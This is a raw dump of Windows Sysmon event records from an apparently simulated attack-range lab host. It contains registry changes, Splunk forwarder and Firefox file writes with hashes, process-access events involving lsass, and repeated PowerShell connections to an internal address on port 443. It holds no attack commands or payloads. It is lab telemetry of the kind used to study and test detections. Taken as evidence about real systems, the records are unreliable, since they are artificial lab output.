18:16:45.010{B81B27B7-4012-611D-1400-00000000C801}884C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{ACF0E042-6EE8-44CF-93DA-B1C31E741B40}\RegisteredSinceBootDWORD (0x00000001) 13241300x800000000000000035085717Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:16:44.994{B81B27B7-4012-611D-1100-00000000C801}968C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{acf0e042-6ee8-44cf-93da-b1c31e741b40}\DhcpConnForceBroadcastFlagDWORD (0x00000000) 22542200x800000000000000035085716Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:09.027{B81B27B7-4F1A-613A-5B90-03000000C801}6804win-dc-128.attackrange.local0::ffff:10.0.1.14;C:\Windows\System32\wbem\WmiPrvSE.exe 13241300x800000000000000035085715Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:16:44.994{B81B27B7-4012-611D-1100-00000000C801}968C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{acf0e042-6ee8-44cf-93da-b1c31e741b40}\IsServerNapAwareDWORD (0x00000000) 13241300x800000000000000035085714Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 
18:16:44.994{B81B27B7-4012-611D-1100-00000000C801}968C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{acf0e042-6ee8-44cf-93da-b1c31e741b40}\AddressTypeDWORD (0x00000000) 13241300x800000000000000035085713Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:16:44.994{B81B27B7-4012-611D-1100-00000000C801}968C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{acf0e042-6ee8-44cf-93da-b1c31e741b40}\LeaseTerminatesTimeDWORD (0x613a5d9c) 13241300x800000000000000035085712Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:16:44.994{B81B27B7-4012-611D-1100-00000000C801}968C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{acf0e042-6ee8-44cf-93da-b1c31e741b40}\T2DWORD (0x613a5bda) 13241300x800000000000000035085711Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:16:44.994{B81B27B7-4012-611D-1100-00000000C801}968C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{acf0e042-6ee8-44cf-93da-b1c31e741b40}\T1DWORD (0x613a5694) 13241300x800000000000000035085710Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:16:44.994{B81B27B7-4012-611D-1100-00000000C801}968C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{acf0e042-6ee8-44cf-93da-b1c31e741b40}\LeaseObtainedTimeDWORD (0x613a4f8c) 13241300x800000000000000035085709Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:16:44.994{B81B27B7-4012-611D-1100-00000000C801}968C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{acf0e042-6ee8-44cf-93da-b1c31e741b40}\LeaseDWORD (0x00000e10) 
13241300x800000000000000035085708Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:16:44.994{B81B27B7-4012-611D-1100-00000000C801}968C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{acf0e042-6ee8-44cf-93da-b1c31e741b40}\DhcpServer10.0.1.1 13241300x800000000000000035085707Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:16:44.994{B81B27B7-4012-611D-1100-00000000C801}968C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{acf0e042-6ee8-44cf-93da-b1c31e741b40}\DhcpSubnetMask255.255.255.0 13241300x800000000000000035085706Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:16:44.994{B81B27B7-4012-611D-1100-00000000C801}968C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{acf0e042-6ee8-44cf-93da-b1c31e741b40}\DhcpIPAddress10.0.1.15 13241300x800000000000000035085705Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:16:44.994{B81B27B7-4012-611D-1100-00000000C801}968C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{acf0e042-6ee8-44cf-93da-b1c31e741b40}\DhcpInterfaceOptionsBinary Data 23542300x800000000000000035085740Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:46.725{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60D4FDEC4CC3A0DAAB00A7A9B8932CAE,SHA256=0689FCEDF44C8D2A417A3E41568DFB11B401E400F278CD7965B6AE4E0F0244AE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085739Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:17:11.019{B81B27B7-4012-611D-1100-00000000C801}968C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.15win-host-987.attackrange.local68bootpcfalse10.0.1.1ip-10-0-1-1.us-west-2.compute.internal67bootps 354300x800000000000000035085738Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:10.667{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56759-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035085744Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:47.742{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1B038FCAF64A22C0340A06ECEBB9973,SHA256=0548317948ABCE9882D1CC8D67E3469CBF3765968CC85B58471A9EE093C564F5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085743Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:11.038{B81B27B7-5BF8-611D-7304-00000000C801}5792C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudpfalsefalse239.255.255.250-1900ssdpfalse127.0.0.1win-host-987.attackrange.local65049- 354300x800000000000000035085742Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:11.038{B81B27B7-5BF8-611D-7304-00000000C801}5792C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse127.0.0.1win-host-987.attackrange.local65049-false239.255.255.250-1900ssdp 354300x800000000000000035085741Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:11.038{B81B27B7-5BF8-611D-7304-00000000C801}5792C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL 
SERVICEudptruefalse10.0.1.15win-host-987.attackrange.local65048-false239.255.255.250-1900ssdp 23542300x800000000000000035085745Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:48.743{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C9DD6A68059FE3978E5C154DACA4412,SHA256=31A783C6350923C8A5B39D65836F007572E52E030329A388AEE3E3C0AD4038EE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085754Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:49.806{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=3EA02E9EEE7E2376AA9E5CD5C1E99BF3,SHA256=911ADF98871C1E2CC7AD07EE35CF40FCAD4E79EADC9DA31A75160935CEB7508F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085753Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:49.806{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=56B021BD914B9A737721564692C54D42,SHA256=DBE30C48C925850A5AF64F9F98944C8016C880DB8738DC58F837278BE678A8E9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085752Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:49.806{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=C106703DA264DF32B5C46F781210CAA0,SHA256=6FAE0E733B0CEEA09CCBC033A932A92FE50F9329F39FCA2B1544FEC0E6527A90,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085751Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:49.806{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=16C2D4A07366CC71B004C0B16A366B9A,SHA256=D97B1FBD2F31F0687B6DB6A71BFC156D237E62C7C55037133AE7D665779C9F7E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085750Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:49.806{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=7BDC80D7FE49C382B10BE6D01BE82196,SHA256=6483589ADBB0D7E5ED638C0C0F58C1BB290F3CA3AC3B965D1FEEFC9EC57F1B10,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085749Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:49.806{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=A7EC48F9A55899A66851720ECE1B9959,SHA256=A893948ED8030668481EE4FFB88E24CFAAFDAB5123515E074B1D1D6FCC602BBF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x800000000000000035085748Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:49.774{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6CE21B0C59A91A3D67A77196A50B9A90,SHA256=BEFD6098E1D3078A8CDCFD741C951B1B0B0D96412544911E25FE130021FB4187,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085747Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:49.690{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=CC5429B4FC5CC4085F0EEE202DF764ED,SHA256=4DF4485CD6233D16785CC54953ACF73618DE8572D3A1801AD04611B770E12269,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085746Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:13.265{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56760-false10.0.1.12-8000- 23542300x800000000000000035085756Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:50.789{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=268E122916EF31ADD7209D56CDF6AC08,SHA256=AE86253A5EA4EE3481BE3015A4707156520D30797D8C18392FB773271E7A951D,IMPHASH=00000000000000000000000000000000falsefalse - 
insufficient disk space 354300x800000000000000035085755Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:14.686{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56761-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035085757Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:51.820{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0CB186EF71C6A9E0089C494DB4BB14D9,SHA256=496EF8B6E7DE36CA14D6C0AFADEF6C1270AFC5F8F2991F5DEFA933822FFCA68A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085758Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:52.837{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=689E8A0CF8EB9AC54180D4662B97D0D8,SHA256=D48C904AC52BE18CD74CE95070FF60BFF976CCF6BBC7F176421E8E8B1AF37CCE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085759Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:53.855{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD2C2526F9DE9A6F06D124C0A6FF3C4F,SHA256=187062AE258C185885DF1BCB885D3D533A635D8A6FBE2FA51B10D1CEB5BC1ABB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085767Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:54.970{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085766Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:54.870{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67F0A8EF80D4A197974B6324A5314C7A,SHA256=334D7EAFA138216D9F83C294C5984E6DF91ADBA2AC9C5A478B6819CB2D9822CB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085765Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:54.817{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=BA27512897D7E35624A7947CD0B4C39E,SHA256=E86B2595A0DD073B99F477E58661F93C96EFB9E94E3DC5283D501875BA374504,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085764Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:16:54.817{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=F9226FA856F7C7F1531E096CD38AA49C,SHA256=3998FD789C6A159A8E9E64E454457FCAAF1582B3954486B606E86F210B21C016,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085763Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:54.817{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=EC2C440164694A92DBA5B7D899FE149E,SHA256=70EEBF6E2237292B14AE68F7BF18B171004B0E9A73B16167B7E77DF96470EAD3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085762Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:54.817{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=5A56634C9670F2B0E26A901DFBF5755D,SHA256=351E36064BBC615116EF9C7A7C51525CEEFE8FE2FF7FF1DD2DD20F5CA844E551,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085761Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:54.817{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=C3EA23DD0042C74AD102F5A0C2E70F4A,SHA256=31014CDA059872EEA4A9D08AEB3AD35F04D8A579D87252862B17B72B5F22292D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085760Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:54.817{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=C5886E2F93EED3ED26151757B7EC1285,SHA256=05409BB4D006D2D2E72B1BAFDC3FD02223DEC43129CF51FDF890F939351BFA58,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085770Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:55.916{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E003AA81F6ECACA9800D69ABE9082A3,SHA256=F54D079FD2C0EEFD1F427FF12B26B80331A9A9CC74AD2B3201D5EA945B14B1B7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085769Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:55.701{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=EA4B5251001785C93D91BCEE1ACAAD19,SHA256=95DEEB24ACBCF4BD2CB477B81F4510BF3346D1D028250EBAE6BFF8DBD1ACF9C0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
354300x800000000000000035085768Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:19.097{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56762-false10.0.1.12-8000- 23542300x800000000000000035085773Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:56.935{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C50F4F25F02998BB412AE9347F9852F6,SHA256=CA1B58BC0F007C89232A0C66A16B5EF9AA58814E6896EE6EE3D18F9CA6EEF055,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085772Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:20.979{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56764-false10.0.1.12-8089- 354300x800000000000000035085771Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:20.696{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56763-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035085774Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:57.967{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6282D581C3E7531C6AF90DE3AD8974E,SHA256=19BEB0926E536C101CF56C223BBDC3477C1034BFCC936AB795DC997058D992BA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085775Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:58.982{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0A64A3D36BC568471AF8E6D76D466CD,SHA256=A8F7D27C4A0AD4C71D241BC9BA442CEBBD070E1E55C24DB6C1566CCA6FEBD176,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035085800Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:59.935{B81B27B7-4013-611D-1600-00000000C801}11961436C:\Windows\system32\svchost.exe{B81B27B7-4F9B-613A-7290-03000000C801}3876C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085799Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:16:59.935{B81B27B7-4013-611D-1600-00000000C801}11961244C:\Windows\system32\svchost.exe{B81B27B7-4F9B-613A-7290-03000000C801}3876C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085798Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:59.881{B81B27B7-4012-611D-0B00-00000000C801}6365724C:\Windows\system32\lsass.exe{B81B27B7-4F9B-613A-7290-03000000C801}3876C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085797Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
